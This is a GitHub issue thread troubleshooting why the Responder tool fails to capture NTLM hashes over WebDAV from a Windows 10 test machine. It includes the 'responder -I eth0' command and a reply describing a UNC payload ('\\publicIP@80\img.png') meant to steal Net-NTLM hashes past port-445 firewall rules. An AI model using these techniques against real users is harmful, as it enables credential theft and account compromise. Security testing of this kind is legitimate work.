WebDav NTLM auth

Question

WebDav NTLM auth

remi-cc opened this issue 7 years ago · 1 comments

Hi all,

I tried to capture NTLM hash with WebDAV HTTP Server but i didn't manage...
Well, the victim's host is a Win 10 (fully updated) machine and the responder's host is a Kali VM.

Victim @ip : 192.168.1.55
responder @ip : 192.168.1.50
I modified responder conf file to disable SMB server, then execute : # responder -I eth0

When the victim ask the test.pdf file ("OPTIONS /test.pdf HTTP/1.1"), responder answer ("HTTP/1.1 200 OK", but without DAV HTTP header) but no NTLM auth followed (NTLM is not disabled in my windows victim conf). And then, victim requested PROPFIND method without any answer (see PCAP transformed in TXT file attached : WebDAV-wihout-NTLM-authen.txt).
It seems that WebDAV server isn't on... I missed something?
PS : It works whith SMB protocol

@lgandx, si tu as 5 mn pour regarder, je t'en serai reconnaissant.

Regards,

Rémi

Answer 1 · 2019-05-16T09:50:48.000Z

Hello, same issue I think, I'm trying to steal Net-NTLM hash with payload like \\publicIP@80\img.png to bypass outgoing firewall rules on 445.
Responder receive HTTP PROPFIND webdav request but doesn't answer to.

Kali and lgandx's git repo seem's to be more up to date than this official (see IsWebDAV implementation in server/HTTP.py but still not work.

Nobody has encountered this kind of problem?

EDIT: https://blog.didierstevens.com/2019/05/20/webdav-ntlm-responder/

Regards,

Hypnoze.